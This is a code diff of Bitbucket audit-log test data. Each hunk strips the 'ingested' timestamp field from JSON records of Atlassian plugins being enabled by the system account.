@@ -3321,7 +3270,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867731470Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.022Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-plugins-webresource-rest\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.4.4-bitbucket1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-plugins-webresource-rest\"}]}", "type": "info", "kind": "event" 
@@ -3375,7 +3323,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867732411Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.005Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-plugins-webresource-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.4.4-bitbucket1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-plugins-webresource-plugin\"}]}", "type": "info", "kind": "event" 
@@ -3429,7 +3376,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867733451Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.001Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-clientside-extensions-runtime\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-clientside-extensions-runtime\"}]}", "type": "info", "kind": "event" 
@@ -3483,7 +3429,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867734635Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.889Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-client-resource\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.0.3\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-client-resource\"}]}", "type": "info", "kind": "event" @@ -3537,7 +3482,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867735726Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.887Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-chaperone\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.1.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-chaperone\"}]}", "type": "info", "kind": "event" 
@@ -3591,7 +3535,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867736660Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.863Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugin.atlassian-spring-scanner-runtime\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.2.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugin.atlassian-spring-scanner-runtime\"}]}", "type": "info", "kind": "event" @@ -3645,7 +3588,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867737636Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.862Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.serviceprovider.sal\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.serviceprovider.sal\"}]}", "type": "info", "kind": "event" 
@@ -3699,7 +3641,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867738624Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.861Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.serviceprovider\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.serviceprovider\"}]}", "type": "info", "kind": "event" @@ -3753,7 +3694,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867739519Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.849Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.consumer\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.consumer\"}]}", "type": "info", "kind": "event" 
@@ -3807,7 +3747,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867740408Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.846Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.admin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.admin\"}]}", "type": "info", "kind": "event" @@ -3861,7 +3800,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867741341Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.845Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.healthcheck.atlassian-healthcheck\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"5.1.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.healthcheck.atlassian-healthcheck\"}]}", "type": "info", "kind": "event" 
@@ -3915,7 +3853,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867742233Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.824Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.diagnostics.atlassian-diagnostics-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.1.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.diagnostics.atlassian-diagnostics-plugin\"}]}", "type": "info", "kind": "event" @@ -3969,7 +3906,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867743511Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.801Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.crowd.embedded.admin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.crowd.embedded.admin\"}]}", "type": "info", "kind": "event" 
@@ -4023,7 +3959,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867744465Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.718Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.business.insights.core-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.1.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.business.insights.core-plugin\"}]}", "type": "info", "kind": "event" @@ -4077,7 +4012,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867745386Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.698Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.business.insights.bitbucket-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.1.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.business.insights.bitbucket-plugin\"}]}", "type": "info", "kind": "event" 
@@ -4131,7 +4065,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867746446Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.697Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.support-info-providers\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.support-info-providers\"}]}", "type": "info", "kind": "event" 
@@ -4185,7 +4118,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867747381Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.634Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.feature-wrm-data\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.feature-wrm-data\"}]}", "type": "info", "kind": "event" @@ -4239,7 +4171,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867748342Z", "original": "{\"timestamp\":\"2021-11-27T17:29:49.656Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.config-wrm-data\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.config-wrm-data\"}]}", "type": "info", "kind": "event" 
@@ -4293,7 +4224,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867749515Z", "original": "{\"timestamp\":\"2021-11-27T17:29:49.399Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-xcode\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-xcode\"}]}", "type": "info", "kind": "event" 
@@ -4347,7 +4277,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867750520Z", "original": "{\"timestamp\":\"2021-11-27T17:29:49.394Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL\"}]}", "type": "info", "kind": "event" 
@@ -4401,7 +4330,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867751546Z", "original": "{\"timestamp\":\"2021-11-27T17:29:48.385Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-web-resource-transformers\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-web-resource-transformers\"}]}", "type": "info", "kind": "event" 
@@ -4455,7 +4383,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867752449Z", "original": "{\"timestamp\":\"2021-11-27T17:29:48.370Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-web-api\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-web-api\"}]}", "type": "info", "kind": "event" @@ -4509,7 +4436,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867753432Z", "original": "{\"timestamp\":\"2021-11-27T17:29:48.363Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-web\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-web\"}]}", "type": "info", "kind": "event" 
@@ -4563,7 +4489,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867754631Z", "original": "{\"timestamp\":\"2021-11-27T17:29:32.073Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-velocity-helper\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-velocity-helper\"}]}", "type": "info", "kind": "event" 
@@ -4617,7 +4542,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867755598Z", "original": "{\"timestamp\":\"2021-11-27T17:29:32.072Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-user-erasure\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-user-erasure\"}]}", "type": "info", "kind": "event" 
@@ -4671,7 +4595,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867756570Z", "original": "{\"timestamp\":\"2021-11-27T17:29:32Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-upm-accessor\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-upm-accessor\"}]}", "type": "info", "kind": "event" 
@@ -4725,7 +4648,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867757577Z", "original": "{\"timestamp\":\"2021-11-27T17:29:31.999Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-tag\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-tag\"}]}", "type": "info", "kind": "event" 
